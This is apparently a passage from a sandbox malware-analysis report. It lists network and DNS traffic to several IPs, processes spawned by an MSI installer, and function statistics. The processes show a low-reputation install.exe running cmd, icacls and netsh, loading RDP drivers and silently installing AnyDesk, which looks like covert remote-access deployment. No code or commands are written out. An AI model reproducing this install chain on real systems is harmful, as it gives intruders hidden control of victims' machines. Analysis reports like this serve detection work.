Aug 5, 2022 18:23:18.109520912 CEST | 49176 | 80 | 192.168.2.22 | 92.223.88.41 |
Aug 5, 2022 18:23:18.117553949 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
Aug 5, 2022 18:23:18.136924982 CEST | 6568 | 49177 | 195.181.174.174 | 192.168.2.22 |
Aug 5, 2022 18:23:18.137054920 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
Aug 5, 2022 18:23:18.137501955 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
Aug 5, 2022 18:23:18.158116102 CEST | 6568 | 49177 | 195.181.174.174 | 192.168.2.22 |
Aug 5, 2022 18:23:18.158333063 CEST | 49177 | 6568 | 192.168.2.22 | 195.181.174.174 |
Aug 5, 2022 18:23:45.921768904 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:46.016635895 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Aug 5, 2022 18:23:46.019696951 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:46.019758940 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:46.153834105 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Aug 5, 2022 18:23:46.159286976 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:46.294455051 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Aug 5, 2022 18:23:46.294933081 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Aug 5, 2022 18:23:46.295002937 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Aug 5, 2022 18:23:46.299264908 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:47.520963907 CEST | 49178 | 20000 | 192.168.2.22 | 80.209.241.3 |
Aug 5, 2022 18:23:47.615866899 CEST | 20000 | 49178 | 80.209.241.3 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 5, 2022 18:23:17.905138016 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 5, 2022 18:23:17.924896002 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Aug 5, 2022 18:23:17.925493956 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 5, 2022 18:23:17.944211960 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Aug 5, 2022 18:23:18.053093910 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 5, 2022 18:23:18.075155973 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Aug 5, 2022 18:23:18.088778019 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Aug 5, 2022 18:23:18.109394073 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Aug 5, 2022 18:23:17.905138016 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:17.925493956 CEST | 192.168.2.22 | 8.8.8.8 | 0x8710 | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:18.053093910 CEST | 192.168.2.22 | 8.8.8.8 | 0xcfca | Standard query (0) | | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:18.088778019 CEST | 192.168.2.22 | 8.8.8.8 | 0x5d9d | Standard query (0) | | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Aug 5, 2022 18:23:17.924896002 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | | | 92.223.88.41 | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:17.944211960 CEST | 8.8.8.8 | 192.168.2.22 | 0x8710 | No error (0) | | | 195.181.174.167 | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:18.075155973 CEST | 8.8.8.8 | 192.168.2.22 | 0xcfca | No error (0) | | | 92.223.88.41 | A (IP address) | IN (0x0001) |
Aug 5, 2022 18:23:18.109394073 CEST | 8.8.8.8 | 192.168.2.22 | 0x5d9d | No error (0) | | | 195.181.174.174 | A (IP address) | IN (0x0001) |
Target ID: | 1 |
Start time: | 18:22:14 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1c0000 |
File size: | 128512 bytes |
MD5 hash: | AC2E7152124CEED36846BD1B6592A00F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 2 |
Start time: | 18:22:15 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\msiexec.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1c0000 |
File size: | 128512 bytes |
MD5 hash: | AC2E7152124CEED36846BD1B6592A00F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 18:22:16 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\VSSVC.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff910000 |
File size: | 1600512 bytes |
MD5 hash: | B60BA0BC31B0CB414593E169F6F21CC2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 4 |
Start time: | 18:22:16 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff7d0000 |
File size: | 27136 bytes |
MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 5 |
Start time: | 18:22:57 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd00000 |
File size: | 73216 bytes |
MD5 hash: | 4315D6ECAE85024A0567DF2CB253B7B0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 6 |
Start time: | 18:23:03 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xd00000 |
File size: | 73216 bytes |
MD5 hash: | 4315D6ECAE85024A0567DF2CB253B7B0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 7 |
Start time: | 18:23:04 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\icacls.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x5b0000 |
File size: | 27136 bytes |
MD5 hash: | 1542A92D5C6F7E1E80613F3466C9CE7F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 9 |
Start time: | 18:23:06 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\expand.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf70000 |
File size: | 53248 bytes |
MD5 hash: | 659CED6D7BDA047BCC6048384231DB9F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 11 |
Start time: | 18:23:11 |
Start date: | 05/08/2022 |
Path: | C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 3837440 bytes |
MD5 hash: | 8C42AB81F90EE0592F7A709F0F7E320B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Target ID: | 12 |
Start time: | 18:23:16 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4a350000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 13 |
Start time: | 18:23:16 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\drivers\rdpdr.sys |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 165888 bytes |
MD5 hash: | 1B6163C503398B23FF8B939C67747683 |
Has elevated privileges: | |
Has administrator privileges: | |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 15 |
Start time: | 18:23:17 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\drivers\tdtcp.sys |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 23552 bytes |
MD5 hash: | 51C5ECEB1CDEE2468A1748BE550CFBC8 |
Has elevated privileges: | |
Has administrator privileges: | |
Programmed in: | C, C++ or other language |
Target ID: | 16 |
Start time: | 18:23:18 |
Start date: | 05/08/2022 |
Path: | C:\ProgramData\anydesk.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1040000 |
File size: | 3829888 bytes |
MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 17 |
Start time: | 18:23:18 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\drivers\tssecsrv.sys |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 39936 bytes |
MD5 hash: | 19BEDA57F3E0A06B8D5EB6D619BD5624 |
Has elevated privileges: | |
Has administrator privileges: | |
Programmed in: | C, C++ or other language |
Target ID: | 18 |
Start time: | 18:23:18 |
Start date: | 05/08/2022 |
Path: | C:\Windows\System32\drivers\rdpwd.sys |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 212480 bytes |
MD5 hash: | FE571E088C2D83619D2D48D4E961BF41 |
Has elevated privileges: | |
Has administrator privileges: | |
Programmed in: | C, C++ or other language |
Target ID: | 20 |
Start time: | 18:23:25 |
Start date: | 05/08/2022 |
Path: | C:\ProgramData\anydesk\AnyDesk.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 3829888 bytes |
MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: | |
Target ID: | 21 |
Start time: | 18:23:32 |
Start date: | 05/08/2022 |
Path: | C:\ProgramData\anydesk\AnyDesk.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 3829888 bytes |
MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 22 |
Start time: | 18:23:41 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4a0e0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 24 |
Start time: | 18:23:42 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4a0e0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 25 |
Start time: | 18:23:42 |
Start date: | 05/08/2022 |
Path: | C:\ProgramData\anydesk\AnyDesk.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 3829888 bytes |
MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 26 |
Start time: | 18:23:54 |
Start date: | 05/08/2022 |
Path: | C:\ProgramData\anydesk\AnyDesk.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 3829888 bytes |
MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 27 |
Start time: | 18:23:58 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\netsh.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x13a0000 |
File size: | 96256 bytes |
MD5 hash: | 784A50A6A09C25F011C3143DDD68E729 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 29 |
Start time: | 18:24:02 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\icacls.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf00000 |
File size: | 27136 bytes |
MD5 hash: | 1542A92D5C6F7E1E80613F3466C9CE7F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 31 |
Start time: | 18:24:06 |
Start date: | 05/08/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4aab0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Execution Graph
Execution Coverage: | 59.4% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 23.6% |
Total number of Nodes: | 55 |
Total number of Limit Nodes: | 0 |
Function 00401254 Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 48, Tags: file, COMMON
C-Code quality: | 100% |
Uniqueness score: | -1.00% |
Function 004013DD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 120, Tags: file, memory, network, COMMON
C-Code quality: | 35% |
Uniqueness score: | -1.00% |
Function 00401798 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 293, Tags: string, COMMON
C-Code quality: | 73% |
Uniqueness score: | -1.00% |
Function 0040179F Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 293, Tags: string, COMMON
C-Code quality: | 73% |
Uniqueness score: | -1.00% |
Function 00401124 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69, Tags: sleep, pipe, file, COMMON
C-Code quality: | 100% |
Uniqueness score: | -1.00% |
Function 004012F1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55, Tags: file, sleep, pipe, COMMON
C-Code quality: | 59% |
Uniqueness score: | -1.00% |
Execution Graph
Execution Coverage: | 15.4% |
Dynamic/Decrypted Code Coverage: | 34.4% |
Signature Coverage: | 9.4% |
Total number of Nodes: | 64 |
Total number of Limit Nodes: | 3 |
Function 010419FE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 01041000 Relevance: 1.6, APIs: 1, Instructions: 107, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 01041CE9 Relevance: 1.6, APIs: 1, Instructions: 52, Tags: COMMON
Uniqueness score: | -1.00% |
Function 01041E30 Relevance: 1.5, APIs: 1, Instructions: 8, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 01041E47 Relevance: 1.3, APIs: 1, Instructions: 10, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 015B0229 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58, Tags: COMMON, LIBRARYCODE
Uniqueness score: | -1.00% |
Function 01042DFD Relevance: 0.5, Instructions: 500, Tags: COMMON
Uniqueness score: | -1.00% |
Function 016F9BE0 Relevance: 59.8, APIs: 20, Strings: 14, Instructions: 276, Tags: file, synchronization, time, COMMON
Uniqueness score: | -1.00% |
Function 016F9BE0 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 276, Tags: file, synchronization, time, COMMON
Uniqueness score: | -1.00% |
Function 0170EE80 Relevance: 7.5, APIs: 5, Instructions: 44, Tags: com, COMMON
Uniqueness score: | -1.00% |
Function 0170EE80 Relevance: 7.5, APIs: 5, Instructions: 44, Tags: com, COMMON
Uniqueness score: | -1.00% |
Function 012A19FE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 012A1000 Relevance: 1.6, APIs: 1, Instructions: 107, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 0180D77A Relevance: 1.6, APIs: 1, Instructions: 52, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 0180D77A Relevance: 1.6, APIs: 1, Instructions: 52, Tags: memory, COMMON, LIBRARYCODE
Uniqueness score: | -1.00% |
Function 012A1E30 Relevance: 1.5, APIs: 1, Instructions: 8, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 018083AE Relevance: 1.5, APIs: 1, Instructions: 3, Tags: COMMON
Uniqueness score: | -1.00% |
Function 012A1E47 Relevance: 1.3, APIs: 1, Instructions: 10, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 01810229 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58, Tags: COMMON, LIBRARYCODE
Uniqueness score: | -1.00% |
Function 014BC790 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 61, Tags: library, loader, COMMON
Uniqueness score: | -1.00% |
Function 014BC790 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 61, Tags: library, loader, COMMON
Uniqueness score: | -1.00% |
Function 016B7970 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 016B7970 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47, Tags: memory, COMMON
Uniqueness score: | -1.00% |
Function 01807BB4 Relevance: 9.0, APIs: 6, Instructions: 47, Tags: COMMON
Uniqueness score: | -1.00% |
Function 01808335 Relevance: 7.5, APIs: 5, Instructions: 34, Tags: COMMON
Uniqueness score: | -1.00% |
Function 01711890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37, Tags: library, COMMON
Uniqueness score: | -1.00% |
Function 01711890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37, Tags: library, COMMON
Uniqueness score: | -1.00% |
Function 01817BE4 Relevance: 6.1, APIs: 4, Instructions: 103, Tags: COMMON
Uniqueness score: | -1.00% |